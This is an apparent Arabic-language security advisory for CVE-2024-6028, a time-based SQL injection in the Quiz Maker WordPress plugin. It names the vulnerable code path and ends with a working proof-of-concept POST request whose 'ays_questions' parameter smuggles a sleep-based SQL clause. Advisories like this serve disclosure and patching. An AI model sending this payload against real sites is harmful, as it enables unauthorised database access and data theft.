
CVE-2024-6028 Quiz Maker <= 6.5.8.3 - حقن SQL غير مصادق عليه عبر معامل 'ays_questions'
CVE-2024-6028 Quiz Maker <= 6.5.8.3 - حقن SQL غير مصادق عليه عبر معامل 'ays_questions'
إضافة Quiz Maker لووردبريس معرضة لحقن SQL المستند إلى الزمن عبر معامل 'ays_questions' في جميع الإصدارات حتى 6.5.8.3 شاملةً، وذلك بسبب عدم كفاية ترميز المعامل المقدم من المستخدم وعدم وجود إعداد كافٍ لاستعلام SQL الموجود. وهذا يتيح للمهاجمين غير المصادق عليهم إلحاق استعلامات SQL إضافية بالاستعلامات الموجودة بالفعل، والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.
الملف: wp-content/plugins/quiz-maker/public/class-quiz-maker-public.php
الفئة: Quiz_Maker_Public
سير العمل: الدالة ays_finish_quiz -> الدالة get_questions_categories image image image
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz
image